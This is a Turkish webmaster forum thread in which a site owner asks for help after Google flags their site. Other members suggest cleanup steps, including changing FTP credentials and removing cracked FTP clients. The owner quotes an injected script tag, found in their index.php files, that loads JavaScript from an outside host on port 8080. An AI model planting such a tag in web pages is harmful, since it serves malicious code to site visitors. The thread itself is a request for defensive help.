sitem virüs uyarısı veriyor

jojoline

New member
Reaction score
0
s.a web sitem bir süredir virüs uyarısı veriyor ...
googleden araştırdım bulduğumbazı yöntemleri denedim index php dosyalarının en altında aşağıdaki kodu buldum ve hepsini sildim ama hergün aynı kod tekrar geliyor naptıysam bi çare bulamadım ...
en sonunda goglede siteyi zararlı ilan etmiş.. napmam gerektiği konusunda bana yardım edermisiniz ...
bide bu dosyaların cmod izinlerinide değiştiremiyorum değiştirdiğimde uygulandı diyor ama tekrar baktığımda eskisi gibi...

bulduğum kod :::

<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/HDMI.js"></script>
<!--5c8b0f8c682750880d8e30634639d640-->

bu kod büttün dosyalarına bulaşmış durumda anladıgım kadarıyla sen bir dosyayı temizliyosun ve gittigini düşünüyosun belli bir süre sonra sildigin dosyaya tekrar bulaşıyo bence ftpdeki büttün dosyaları html editör bir programla yada notpade önce bilgisayarına indirip daha sonra tek tek temizliyerek ftp ter temiz bir şekilde atmalısın ve google webmaster tools a siteni kaydettiysen degerlendirme istemelisin belli yönergeler var ve bunları okuyarak 24 saat içersinde siteni eski haline döndürebilirsin.. şimdiden kolay gelsin

ben bütün index php dosyalarını temizledim tekrar tekrar kontrolda ettim bişey yok uyarıda vermiyor ama ertesigün tekrar çıkıyor..
acaba sadece index dosyalarına mı bulaşıyor çünkü bikaç başka dosyayı kontrol ettim bişey yoktu ...
temizledikten sonra bi daha bulaşmaması için ne yapmalıyım peki?
şimdiden sağol

sitende google tarafından banlanmış (illegal içerikli, virüslü, warez bulunduran) sitelere ait backlinkler
bulunmasından dolayı olabilir.yani bu sitelerle yüklü bi bağlantın olduğunda google karşıdaki kullanıcıyı
uyarmak ister

kardeşim bunun için yapman gereken adımlar sunlar;

1- pc ni guncel bir antivirus programı ile tarat... ikna olmazsan 2. yada 3. yu dene... böylece pcsine virus bulasmıssa silersin ....
2- dosyaları pcsine al ve içindeki tüm yabancı kodları temizle....
3- CuteFTP programını yada diğer FTP programlarını patch yada crackle kullanıyorsan, sil hepsini ....
4- FileZilla FTP programını yukle ... temizlediğin dosyaları yeniden FTP ye at...
5- googleden yeniden inceleme isteği yap ....

bu virus, senin ftp şifreni alarak ( buyuk ihtimalle kullanılan crack sayesinde ) belirli aralıklarla siteye giriş yapıp dosyaları kontrol eder. eger kod yoksa yeniden içine kodu ekler... FTP şifreni ve kullanıcı adını mutlaka değiştirdikten sonra yukarıdaki yapmanla duzelecektir.

NOT : Aynı Sorunu Bende Yaşadım ve Yukarıdaki Adımlar Sayesinde Duzelttim.

Geri